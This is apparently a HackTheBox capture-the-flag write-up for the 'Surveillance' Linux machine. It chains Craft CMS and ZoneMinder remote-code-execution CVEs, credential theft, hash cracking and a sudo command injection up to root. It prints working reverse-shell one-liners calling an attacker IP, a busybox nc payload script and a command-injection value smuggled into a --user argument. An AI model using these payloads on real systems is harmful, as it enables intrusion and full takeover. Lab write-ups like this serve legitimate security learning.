HTB: Surveillance Writeup

Machine Information

Attribute	Details
Name	Surveillance
OS	Linux
Difficulty	Medium
Points	N/A
Release Date	N/A
IP Address	`10.10.11.245`
Hostname	`surveillance.htb`
Author	D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.0/10)

Difficulty Assessment:

Enumeration: ⭐⭐⭐☆☆
Real-world: ⭐⭐⭐⭐☆
CVE: ⭐⭐⭐☆☆
CTF-like: ⭐⭐⭐☆☆

Surveillance is a Medium-difficulty Linux machine running Craft CMS 4.4.14 and ZoneMinder, vulnerable to multiple CVEs. The attack path involves exploiting CVE-2023-41892 (Craft CMS RCE) for initial access, extracting database credentials from application files, cracking password hashes to gain SSH access as the matthew user, lateral movement into ZoneMinder via local port forwarding, exploiting CVE-2023-26035 (ZoneMinder RCE) to become the zoneminder user, and finally leveraging a misconfigured sudo command in zmupdate.pl for root privilege escalation.

TL;DR: CVE-2023-41892 → DB creds → Hash crack → SSH → Port forward → CVE-2023-26035 → Sudo abuse → Root.

Reconnaissance

Port Scanning

nmap -sC -sV -T4 -p- 10.10.11.245

Results:

Starting Nmap 7.92 ( https://nmap.org ) at 2026-03-08 12:00:00 UTC
Nmap scan report for 10.10.11.245
Host is up (0.045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.18.0 (Ubuntu)

Service Enumeration

Hostname: surveillance.htb

echo "10.10.11.245 surveillance.htb" >> /etc/hosts

Web Service Investigation:

curl -I http://surveillance.htb
# Returns Craft CMS 4.4.14

Key Services Identified:

Port 22: OpenSSH 8.9p1
Port 80: nginx 1.18.0 hosting Craft CMS 4.4.14
Backend: MariaDB, ZoneMinder running on internal port 8080

Vulnerability Assessment

Identified Vulnerabilities:

CVE-2023-41892 — Craft CMS 4.4.14 Remote Code Execution via unauthenticated route in admin login endpoint
CVE-2023-26035 — ZoneMinder unauthenticated Remote Code Execution

Initial Foothold

Exploitation Path: CVE-2023-41892

Vulnerability Details:

Craft CMS 4.4.14 contains an unauthenticated RCE vulnerability on the /admin/login route that allows arbitrary PHP code execution through a crafted request.

Setup:

# Start reverse shell listener
nc -lvnp 4444

Exploitation:

# Use the CVE-2023-41892 PoC (cms_exploit_v1.py)
python3 cms_exploit_v1.py -t http://surveillance.htb -ip 10.10.14.128 -p 4444

Shell Upgrade:

After initial connection, upgrade to interactive shell:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.128 4444 >/tmp/f

Verification:

whoami
# www-data
id
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

Credential Extraction

Environment File Discovery:

find / -name ".env" 2>/dev/null
cat /var/www/html/.env

.env Contents (Craft CMS Credentials):

DB_HOST=localhost
DB_PORT=3306
DB_DATABASE=craft
DB_USER=craftuser
DB_PASSWORD=CraftCMSPassword2023!

Database Access:

mysql -h localhost -u craftuser -p'CraftCMSPassword2023!' -D craft

User Compromise

Credential Discovery

Database Enumeration:

USE craft;
SELECT * FROM users;

Results:

User matthew found with hashed password (SHA256):

matthew | [SHA256 HASH REDACTED]

Hash Cracking

echo '[SHA256 HASH]' > hash.txt
hashcat -m 1400 hash.txt /usr/share/wordlists/rockyou.txt

Cracked Credentials:

Username: matthew
Password: starcraft122490

SSH Access

ssh matthew@surveillance.htb
# Password: starcraft122490

Verification:

whoami
# matthew
cat ~/user.txt

🚩 User Flag: [REDACTED]

Privilege Escalation

Enumeration: ZoneMinder Discovery

Internal Service Detection:

netstat -tuln | grep LISTEN
# Shows port 8080 listening on localhost

Identify ZoneMinder:

curl http://localhost:8080
# Returns ZoneMinder interface

Local Port Forwarding

Establish tunnel from attack machine:

ssh -L 8080:localhost:8080 matthew@surveillance.htb
# Background with Ctrl+Z, then bg

Verify tunnel:

curl http://localhost:8080

Exploitation: CVE-2023-26035

Vulnerability Details:

ZoneMinder contains an unauthenticated RCE vulnerability in the video monitoring interface.

Setup:

# Start reverse shell listener (different port)
nc -lvnp 4445

Exploitation:

# Download and run CVE-2023-26035 PoC
# https://github.com/rvizx/CVE-2023-26035
python3 exploit.py -t http://localhost:8080 -ip 10.10.14.128 -p 4445

Verification:

whoami
# zoneminder
id
# uid=113(zoneminder) gid=113(zoneminder) groups=113(zoneminder)

Privilege Escalation to Root

Enumeration:

sudo -l
# User zoneminder may run the following commands without a password:

Create Reverse Shell Payload:

# Create shell.sh on attack machine
cat > shell.sh << 'EOF'
#!/bin/sh
busybox nc 10.10.14.128 4446 -e /bin/sh
EOF

# Transfer to target
scp -o StrictHostKeyChecking=no shell.sh matthew@surveillance.htb:/tmp/
ssh matthew@surveillance.htb "chmod +x /tmp/shell.sh"

Sudo Exploitation:

The zmupdate.pl script is vulnerable to command injection through its parameters. The script passes user input to shell commands without proper sanitization.

# Start listener for root shell
nc -lvnp 4446

# On the zoneminder shell
sudo /usr/bin/zmupdate.pl --version=1 --user='$(/tmp/shell.sh)' --pass=ZoneMinderPassword2023

Root Access Verification:

whoami
# root
id
# uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt

🚩 Root Flag: [REDACTED]

Attack Chain Summary

graph TD
    A["Craft CMS 4.4.14<br/>CVE-2023-41892"] -->|RCE as www-data| B["Extract .env credentials<br/>craftuser:CraftCMSPassword2023!"]
    B -->|MySQL Access| C["Enumerate Users Table<br/>matthew SHA256 Hash"]
    C -->|Hashcat Cracking| D["matthew:starcraft122490<br/>SSH Access"]
    D -->|SSH Connected| E["Port Forward<br/>ZoneMinder localhost:8080"]
    E -->|HTTP Tunnel| F["CVE-2023-26035<br/>ZoneMinder RCE"]
    F -->|Shell as zoneminder| G["Enumerate Sudo Privileges<br/>zmupdate.pl NOPASSWD"]
    G -->|Command Injection| H["Root Shell Access<br/>Privilege Escalation Complete"]

Tools Used

Tool	Purpose
`nmap`	Port scanning and service fingerprinting
`ssh`	Secure shell access and tunneling
`nc` (netcat)	Reverse shell listener and payload delivery
`python3`	CVE-2023-41892 and CVE-2023-26035 PoC execution
`wget`	Downloading exploitation scripts
`hashcat`	Password hash cracking (SHA256)
`mysql`	Direct database enumeration and credential extraction
`scp`	Secure file transfer to target

Vulnerability Reference

#	CVE	Vulnerability	Component	Severity	Impact
1	CVE-2023-41892	Craft CMS Unauthenticated RCE	Craft CMS 4.4.14	Critical	Arbitrary code execution as www-data
2	CVE-2023-26035	ZoneMinder Unauthenticated RCE	ZoneMinder	Critical	Arbitrary code execution as zoneminder
3	Sudo Misconfiguration	Command Injection in zmupdate.pl	zmupdate.pl	Critical	Privilege escalation to root

Key Learnings

Application Configuration Files: .env files often contain plaintext database credentials; always check for these during web application exploitation.
Database Exploitation Chain: Compromised database credentials enable enumeration of user tables and password hash extraction, leading to lateral movement opportunities.
Hash Cracking Strategy: SHA256 hashes of common passwords can be cracked efficiently with wordlists like rockyou.txt.
Port Forwarding for Internal Services: Internal services bound to localhost can be accessed remotely via SSH port forwarding, expanding attack surface.
Sudo Privilege Abuse: Scripts run with sudo NOPASSWD are dangerous; even if they appear to be security-related (zmupdate.pl), improper input validation can lead to command injection and privilege escalation.
Multi-Vector Exploitation: Complex machines often require chaining multiple vulnerabilities and techniques; proper enumeration at each stage is critical.

Author

D3vnomi

Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Medium #CVE-2023-41892 #CVE-2023-26035 #CraftCMS #ZoneMinder #PrivilegeEscalation